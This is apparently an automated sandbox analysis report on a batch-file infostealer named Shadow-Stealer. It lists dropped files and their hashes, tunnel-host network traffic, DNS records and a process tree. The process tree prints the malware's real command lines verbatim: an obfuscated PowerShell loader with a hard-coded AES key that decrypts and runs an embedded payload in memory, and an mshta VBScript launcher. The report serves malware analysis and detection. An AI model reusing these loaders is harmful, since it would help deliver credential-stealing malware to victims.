                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\$sxr-powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\$sxr-powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\$sxr-powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):452608
                                                                                                        Entropy (8bit):5.459268466661775
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                                                                        MD5:04029E121A0CFA5991749937DD22A1D9
                                                                                                        SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                                                        SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                                                        SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: trafik_yenilme.bat, Detection: malicious, Browse
                                                                                                        • Filename: a.bat, Detection: malicious, Browse
                                                                                                        • Filename: Rune_Launcher.bat, Detection: malicious, Browse
                                                                                                        • Filename: SCO_23.bat, Detection: malicious, Browse
                                                                                                        • Filename: IMG_690B23.docx.bat, Detection: malicious, Browse
                                                                                                        • Filename: Qtagiietkyb.png.bat, Detection: malicious, Browse
                                                                                                        • Filename: IMG_690B23.bat, Detection: malicious, Browse
                                                                                                        • Filename: SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exe, Detection: malicious, Browse
                                                                                                        • Filename: SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exe, Detection: malicious, Browse
                                                                                                        • Filename: 345d.cmd, Detection: malicious, Browse
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        • Filename: PingOptimizerMain.bat, Detection: malicious, Browse
                                                                                                        • Filename: crack.bat, Detection: malicious, Browse
                                                                                                        • Filename: da49aae4ea90792e9f5497dcd2c4fa8cf7bb98a23b2d846ab985facf.bat, Detection: malicious, Browse
                                                                                                        • Filename: Final_rooming_list.bat, Detection: malicious, Browse
                                                                                                        • Filename: RE_432-7784.js, Detection: malicious, Browse
                                                                                                        • Filename: FA150623.pdf.bat, Detection: malicious, Browse
                                                                                                        • Filename: Uni.bat, Detection: malicious, Browse
                                                                                                        • Filename: update_SC.bat, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289792
                                                                                                        Entropy (8bit):6.135598950357573
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                                        MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                                        SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                                        SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14848
                                                                                                        Entropy (8bit):4.477514759495553
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Mp2bLg8CB95kCfjmRXKbpkSprJ6AdgxYsPvWw5aIR:MpMLgdrkCjm9KZJAXWw5
                                                                                                        MD5:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                        SHA1:51C97EBE601EF079B16BCD87AF827B0BE5283D96
                                                                                                        SHA-256:DBA3137811C686FD35E418D76184070E031F207002649DA95385DFD05A8BB895
                                                                                                        SHA-512:D9DF8C1F093EA0F7BDE9C356349B2BA43E3CA04B4C87C0F33AB89DDA5AFE9966313A09B60720AA22A1A25D43D7C71A060AF93FB8F6488201A0E301C83FA18045
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}xT[9.:.9.:.9.:.0a..=.:.-r9.;.:.-r>.(.:.9.;...:.-r;.:.:.-r?.:.:.-r2.:.:.-r..8.:.-r8.8.:.Rich9.:.........PE..d.....c..........."............................@....................................r'....`.................................................d'..P....P.......@...............p.. ....$..T............................ ..............(!..p............................text............................... ..`.rdata..4.... ......................@..@.data........0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc.. ....p.......8..............@..B........................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):452608
                                                                                                        Entropy (8bit):5.459268466661775
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                                                                        MD5:04029E121A0CFA5991749937DD22A1D9
                                                                                                        SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                                                        SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                                                        SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                        File type:ASCII text, with very long lines (4949), with CRLF line terminators
                                                                                                        Entropy (8bit):6.034917295946877
                                                                                                        TrID:
                                                                                                          File name:Shadow-Stealer.bat
                                                                                                          File size:13'144'733 bytes
                                                                                                          MD5:cf5b412ffc3ce43cd7ddce602fc67f56
                                                                                                          SHA1:221dfcd0868158f676c472d8a5bcf9647f0c7d51
                                                                                                          SHA256:84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
                                                                                                          SHA512:695489d3b02863c382dc4b044bd80825b3f46eadfe4647619a0036da7ab3405b7925e89a457b19ee57995a59dcf8d5f9df237cd4d5d59a6cee3914aeaee2a8ef
                                                                                                          SSDEEP:49152:mmlB6XvIxKx/znMtw4e/x4dA+ilmm5C5rsw1y1lkGxJW5RXLnfaWixbVoZmb0nYk:b
                                                                                                          TLSH:52D6C0DAFE622B6C030B1C9749025DD9981DC2A724F1CEDFBE106B1B205B6C1EED5297
                                                                                                          File Content Preview:%gfJDTDQFGwMPRbEGEjqFrFhhqZzZBawNSJUWBhSvEagyQWNAEcrIXXBayaLuDoDdzywIGgFVQwBPXiQSLzVWimnuIuXYUXqOXByRaFrWXUpbWjDNJrgDRfwKIBAMHfBqDkpVjzqGGzyMwLVWoKObqmwrFmIYFfOrTzXkugbKAZxSghNxdaVxPWAOoyPxoQBZjFrxmjcIgDaPpbLVXLvbIQawzIwvPfUhYViZoQIvyMOLwiXLluWcVWQRcwycmh
                                                                                                          Icon Hash:9686878b929a9886
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 3, 2023 16:35:27.356673956 CET4971622112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:35:27.542896032 CET2211249716167.71.56.116192.168.2.6
                                                                                                          Dec 3, 2023 16:35:27.543107033 CET4971622112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:35:28.370522976 CET4971622112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:35:28.557357073 CET2211249716167.71.56.116192.168.2.6
                                                                                                          Dec 3, 2023 16:35:43.558749914 CET2211249716167.71.56.116192.168.2.6
                                                                                                          Dec 3, 2023 16:35:43.558934927 CET4971622112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:35:53.642613888 CET4971622112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:35:53.828510046 CET2211249716167.71.56.116192.168.2.6
                                                                                                          Dec 3, 2023 16:36:08.844676971 CET2211249716167.71.56.116192.168.2.6
                                                                                                          Dec 3, 2023 16:36:08.844876051 CET4971622112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:36:18.830081940 CET4971622112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:36:19.016064882 CET2211249716167.71.56.116192.168.2.6
                                                                                                          Dec 3, 2023 16:36:25.571134090 CET2211249716167.71.56.116192.168.2.6
                                                                                                          Dec 3, 2023 16:36:27.174932003 CET4972522112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:36:27.366257906 CET2211249725167.71.56.116192.168.2.6
                                                                                                          Dec 3, 2023 16:36:27.366410017 CET4972522112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:36:27.366954088 CET4972522112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:36:27.557534933 CET2211249725167.71.56.116192.168.2.6
                                                                                                          Dec 3, 2023 16:36:42.576751947 CET2211249725167.71.56.116192.168.2.6
                                                                                                          Dec 3, 2023 16:36:42.576874971 CET4972522112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:36:52.564503908 CET4972522112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:36:52.756547928 CET2211249725167.71.56.116192.168.2.6
                                                                                                          Dec 3, 2023 16:37:07.792742968 CET2211249725167.71.56.116192.168.2.6
                                                                                                          Dec 3, 2023 16:37:07.792809010 CET4972522112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:37:17.814313889 CET4972522112192.168.2.6167.71.56.116
                                                                                                          Dec 3, 2023 16:37:18.006856918 CET2211249725167.71.56.116192.168.2.6
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 3, 2023 16:35:26.905977964 CET6016353192.168.2.61.1.1.1
                                                                                                          Dec 3, 2023 16:35:27.268147945 CET53601631.1.1.1192.168.2.6
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Dec 3, 2023 16:35:26.905977964 CET192.168.2.61.1.1.10x11b1Standard query (0)throbbing-mountain-09011.pktriot.netA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Dec 3, 2023 16:35:27.268147945 CET1.1.1.1192.168.2.60x11b1No error (0)throbbing-mountain-09011.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 3, 2023 16:35:27.268147945 CET1.1.1.1192.168.2.60x11b1No error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false

                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:16:34:44
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Shadow-Stealer.bat" "
                                                                                                          Imagebase:0x7ff7bf910000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:1
                                                                                                          Start time:16:34:44
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:16:34:51
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                                          Imagebase:0x7ff6bffc0000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          • Detection: 0%, Virustotal, Browse
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:8
                                                                                                          Start time:16:35:07
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{2ca74e05-00fd-4f33-afb0-1baa728859ba}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:9
                                                                                                          Start time:16:35:07
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{a795ed5e-f9f8-4b9c-9e39-bf732c676d16}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:10
                                                                                                          Start time:16:35:12
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\$sxr-mshta.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                                                                                                          Imagebase:0x7ff64e1d0000
                                                                                                          File size:14'848 bytes
                                                                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          • Detection: 0%, Virustotal, Browse
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:11
                                                                                                          Start time:16:35:12
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{3885b722-1a15-44b5-b09d-ff91e5413f87}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:12
                                                                                                          Start time:16:35:12
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{99a849d9-b898-48bd-a9ae-8d2739f763c9}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:13
                                                                                                          Start time:16:35:13
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\$sxr-cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%
                                                                                                          Imagebase:0x7ff7137e0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          • Detection: 0%, Virustotal, Browse
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:14
                                                                                                          Start time:16:35:13
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:15
                                                                                                          Start time:16:35:13
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\$sxr-powershell.exe
                                                                                                          Wow64 process (32bit):false
